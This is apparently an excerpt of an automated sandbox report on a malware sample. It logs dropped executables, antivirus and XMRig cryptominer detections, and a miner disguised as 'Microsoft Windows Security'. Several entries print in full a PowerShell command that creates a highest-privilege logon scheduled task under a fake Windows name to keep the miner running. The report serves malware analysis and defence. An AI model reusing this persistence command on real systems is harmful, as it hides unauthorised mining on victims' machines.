                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
                                                                                                                                                                                                                                                  Imagebase:0x7ff618200000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                  Start time:11:32:19
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
                                                                                                                                                                                                                                                  Imagebase:0x7ff618200000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                  Start time:11:32:20
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                  Start time:11:32:21
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2688734187.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2688734187.exe
                                                                                                                                                                                                                                                  Imagebase:0x7ff6d3c30000
                                                                                                                                                                                                                                                  File size:5'827'584 bytes
                                                                                                                                                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                  Start time:11:32:25
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1657630034.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1657630034.exe
                                                                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                                                                  File size:62'976 bytes
                                                                                                                                                                                                                                                  MD5 hash:77C5EB90118287F666886FC34210C176
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                  Start time:11:32:27
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                  Start time:11:32:27
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                  Start time:11:32:34
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2910625892.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2910625892.exe
                                                                                                                                                                                                                                                  Imagebase:0x9e0000
                                                                                                                                                                                                                                                  File size:66'560 bytes
                                                                                                                                                                                                                                                  MD5 hash:69A5D3C6E993B5A1BAFACF806647DF7D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                  Start time:11:32:39
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
                                                                                                                                                                                                                                                  Imagebase:0x250000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                  Start time:11:32:39
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
                                                                                                                                                                                                                                                  Imagebase:0x250000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                  Start time:11:32:42
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff731cd0000
                                                                                                                                                                                                                                                  File size:5'827'584 bytes
                                                                                                                                                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, Author: unknown
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                  Start time:11:32:48
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                  Start time:11:32:48
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                  Start time:11:33:07
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                  Start time:11:33:07
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                  Start time:11:33:07
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                  Start time:11:33:39
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                                                                  Imagebase:0x7ff613010000
                                                                                                                                                                                                                                                  File size:94'720 bytes
                                                                                                                                                                                                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.3945886291.000001A567EC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                  Start time:11:33:30
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                  Start time:11:33:30
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                  Start time:11:33:59
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                  Start time:11:33:59
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                                  Start time:11:34:30
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7a1ef0000
                                                                                                                                                                                                                                                  File size:5'827'584 bytes
                                                                                                                                                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, Author: unknown
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                  Start time:11:34:45
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                                  Start time:11:34:45
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1369111705.0000000004A3C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366720920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366742577.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366785240.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366785240.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1366785240.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.00000000049DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.00000000049DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.00000000049E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.0000000004A1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.0000000004A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1368983685.0000000004A2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f5TWdT5EAc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                                                                                                                                                                                                                                                    • Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:36.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:27.2%
                                                                                                                                                                                                                                                    Total number of Nodes:92
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
